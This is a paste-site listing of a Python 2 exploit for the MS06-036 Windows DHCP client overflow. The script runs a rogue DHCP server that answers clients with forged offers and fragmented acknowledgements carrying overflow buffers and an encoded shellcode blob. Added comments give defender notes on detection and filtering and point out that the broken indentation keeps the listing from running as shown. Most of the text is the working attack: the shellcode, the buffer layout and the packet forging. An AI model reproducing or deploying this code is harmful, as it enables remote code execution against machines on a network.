FlyFar

Exploit.Python.Ms06-036.a - Source Code

Jul 6th, 2023
  1. #!/usr/bin/env python
  2. #
  3. #
  4. # by redsand@blacksecurity.org
  5. #   this (like any thing) would not be possible w/out the bl4ck team.
  6. #   thanks guys.
  7. #
  8.  
  9. import sys, os
  10.  
  11. sys.path.append("pydhcplib")
  12.  
  13. from scapy import *
  14.  
  15. from pydhcplib.dhcp_packet import *
  16. from pydhcplib.dhcp_network import *
  17. from pydhcplib.type_strlist import *
  18. from pydhcplib.type_ipv4 import *
  19. from pydhcplib.type_hw_addr import *
  20.  
# Interface the forged replies are sent on; replaced by argv[1] at the bottom
# of the script. "vmnet8" looks like a VMware virtual adapter name --
# presumably the author's lab setup.
inet_face = "vmnet8"

# Address offered to a client when its request carries no usable
# request_ip_address option; replaced by argv[2] at the bottom of the script.
default_ip = "10.31.33.7"
  24.  
# user bl4ck/bl4ck
# this exits via Thread (so that we kill the dhcp thread in services.exe)
#
# this means if services doesn't crash, it was a successful exploit
#
  30. scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
  31. "\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
  32. "\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
  33. "\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
  34. "\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
  35. "\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
  36. "\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
  37. "\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
  38. "\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
  39. "\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
  40. "\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
  41. "\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
  42. "\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
  43. "\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
  44. "\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
  45.  
  46.  
  47.  
# Arguments handed to Server(): listen on every local address, using the
# standard DHCP ports (67 server side, 68 client side). The ports are given
# as strings, as the script passes them through to pydhcplib unchanged.
netopt = {'client_listen_port':"68",
           'server_listen_port':"67",
           'listen_address':"0.0.0.0"}
  51.  
  52.  
def substr(i, o, off):
    """Overlay ``o`` onto ``i`` starting at index ``off``.

    The part of ``i`` that ``o`` covers is dropped and ``o`` is spliced in
    its place; everything before ``off`` and everything from
    ``off + len(o)`` onwards is kept as it was.
    """
    tail_start = off + len(o)
    return i[:off] + o + i[tail_start:]
  58.  
def io(i):
    """Return the low 32 bits of ``i`` as four characters, lowest byte first."""
    # One character per byte, taken at shifts 0, 8, 16 and 24.
    return "".join(chr((i >> shift) % 256) for shift in (0, 8, 16, 24))
  72.  
# Rogue DHCP server used by this sample (the banner printed at the bottom of
# the script names it "MS06-036 DHCP Client Domain Name Overflow"). It
# subclasses pydhcplib's DhcpServer and overrides the per-message handlers:
#   - DISCOVER -> replies with an OFFER for default_ip
#   - REQUEST  -> replies with an ACK that has a long run of extra bytes
#                 passed to EncodePacket
#   - DECLINE / RELEASE / INFORM -> ignored
#
# Defender notes (derived from the packet construction below):
#   - The OFFER/ACK source address is <client /24>.254 and the advertised DNS
#     server and router are <client /24>.2, whatever the real network layout
#     is; a DHCP reply from an address that is not a known server is the
#     first signal.
#   - The ACK is sent as IP fragments and its extra data starts with 0F FF
#     (0x0F is the DHCP Domain Name option code, 15) followed by repeated
#     FA FF-prefixed 255-byte blocks, mostly 0x90 filler -- presumably parsed
#     as option 15 / option 250 with length 255; confirm against a capture.
#   - The client-side fix is the vendor update for MS06-036; on the network
#     side, DHCP snooping or equivalent filtering of server replies (UDP
#     source port 67) from untrusted ports keeps a host like this from
#     answering clients.
#
# NOTE(review): indentation in this paste is inconsistent, so the listing as
# shown does not parse as Python.
class Server(DhcpServer):
    def __init__(self, options):
        # Pass the listen address and the client/server ports from the
        # options dict straight to pydhcplib's DhcpServer.
        DhcpServer.__init__(self,options["listen_address"],
                            options["client_listen_port"],
                            options["server_listen_port"])

    # DISCOVER handler: always offers default_ip (nothing from the client's
    # packet is consulted for the address) and derives the fake server (.254)
    # and the DNS/router address (.2) from the same first three octets.
    def HandleDhcpDiscover(self, packet):
    my_reqip = ''

    my_reqip = default_ip

    sid_i = my_reqip.rfind(".")
    server_ip = my_reqip[0:sid_i] + ".254"

    our_ip = my_reqip[0:sid_i] + ".2"

    mymac = hwmac(packet.GetHardwareAddress()).str()
        print "** Received discover from %s (%s)" % (mymac,my_reqip)

    # dhcp_message_type 2 = DHCPOFFER; lease bytes [0,0,7,8] = 1800 seconds.
    mpacket = DhcpPacket()
    mpacket.CreateDhcpOfferPacketFrom(packet)
    mpacket.SetOption("dhcp_message_type",[2])
    mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
    mpacket.SetOption("siaddr", ipv4(server_ip).list())
    mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
    mpacket.SetOption("flags",[0,0])
    mpacket.SetOption("server_identifier", ipv4(server_ip).list())
    mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
    mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
    mpacket.SetOption("router",ipv4(our_ip).list())

        # The OFFER's domain_name option is filled with 255 'N' characters.
        mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())

    # NOTE(review): `append` is assigned five times with the same value and is
    # never used -- EncodePacket is called with '' below, so the OFFER itself
    # carries no extra trailing data.
    append = "\xfa\xff" + ( "\x90" * 0xff )
    append = "\xfa\xff" + ( "\x90" * 0xff )
    append = "\xfa\xff" + ( "\x90" * 0xff )
    append = "\xfa\xff" + ( "\x90" * 0xff )
    append = "\xfa\xff" + ( "\x90" * 0xff )

    # Frame goes to the client's MAC at layer 2 and to the limited broadcast
    # address at layer 3, from UDP 67 to UDP 68.
    p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')

    print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
    sendp(p, iface=inet_face, verbose=False)

    # REQUEST handler: answers with an ACK for the address the client asked
    # for (or default_ip), with the `append` data built below passed to
    # EncodePacket.
    def HandleDhcpRequest(self, packet):


    # ip, sid and ciaddr are read here but not used in the visible code.
    ip = packet.GetOption("request_ip_address")
        sid = packet.GetOption("server_identifier")
        ciaddr = packet.GetOption("ciaddr")
    my_reqip = ''
    # Bare except: any failure while reading the requested address (for
    # example the option being absent) falls back to default_ip.
    try:
        data = packet.options_data['request_ip_address']
        for i in range(0,len(data),4) :
                        if len(data[i:i+4]) == 4 :
                            my_reqip += ipv4(data[i:i+4]).str()
    except:
        my_reqip = default_ip

    mymac = hwmac(packet.GetHardwareAddress()).str()
        print "** Received request from %s (%s)" % (my_reqip,mymac)
    sid_i = my_reqip.rfind(".")
    server_ip = my_reqip[0:sid_i] + ".254"

    our_ip = my_reqip[0:sid_i] + ".2"

    mypacket = DhcpPacket()
    mypacket.CreateDhcpAckPacketFrom(packet)
    mypacket.SetOption("yiaddr", ipv4(my_reqip).list())

    dumbstr = "\x90" * 0xFF

    # we're looking for a jmp/call ebx ?! or landing in our codespace
    # directly

    # C5 converts to 253C
    # BB = 2557
    # AA = 00AC
    # DD = 258C
    # EE = 03B5
    # 88 = 00D6
    # 99 = 00EA
    # F3 = 2591
    # B0 = 2264
    # 8F = 00c5

    eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
    #eipstr = "C" * 0xFF


    payload = "\x42" * 0xFF
    payload = substr(payload, scode, 1)


    ## find location in heap to ret2
    # find offset & append as many "\x26\x6e\x43\x6e"
    # to increment ebx to a non trashed location (since ebx points to our code)
    # then push ebx \x53 and  \xc4 (retn)
    #
    # we're looking for a pop+pop+ret or a jmp/call ebx to return to our
    # unicode filtered input
    # note it must be within the bounds of 0x0000**** - 0x0070****
    # or 0x22***** <-- wont help us

    # Fourteen chunks, each a two-byte prefix followed by up to 255 bytes;
    # how EncodePacket places this data in the ACK is not visible here.
    append = "\x0f\xff" + ( "\x90" * 0xff )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( eipstr )
    append += "\xfa\xff" + ( eipstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( dumbstr )
    append += "\xfa\xff" + ( payload[0:254]) + "\x00"

    print "Length of our attack: %r" % len(append)

    # The ACK is split into IP fragments (fragment size argument 1024) and
    # each fragment is sent in its own Ethernet frame to the client's MAC.
    eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
    p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
    print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
    for i in p:
        sendp(eth/i, iface=inet_face, verbose=False)

    # DECLINE, RELEASE and INFORM are accepted and ignored; the debug output
    # after each `return` is commented out.
    def HandleDhcpDecline(self, packet):
    return
    #print "** Dhcp Declined"
        #packet.PrintHeaders()
        #packet.PrintOptions()

    def HandleDhcpRelease(self, packet):
    return
        #packet.PrintHeaders()
        #packet.PrintOptions()

    def HandleDhcpInform(self, packet):
    return
        #packet.PrintHeaders()
        #packet.PrintOptions()
  215.  
  216.  
  217.  
# Script entry (Python 2 print statements). The banner and usage line are
# printed on every run, whether or not arguments were given.
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
print "\t by redsand@blacksecurity.org"
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
print ""


# Optional argv[1] / argv[2] replace the module-level interface name and
# fallback address that the Server handlers read.
if len(sys.argv) > 1:
    inet_face = sys.argv[1]

if len(sys.argv) > 2:
    default_ip = sys.argv[2]

print "Listening for client requests:\n"
print "Listening on interface: %s" % inet_face
print "Using default address: %s" % default_ip

server = Server(netopt)

# Runs until the process is killed. GetNextDhcpPacket comes from pydhcplib;
# presumably it reads one packet and dispatches it to the matching Handle*
# method -- its implementation is not visible here.
while True :
    server.GetNextDhcpPacket()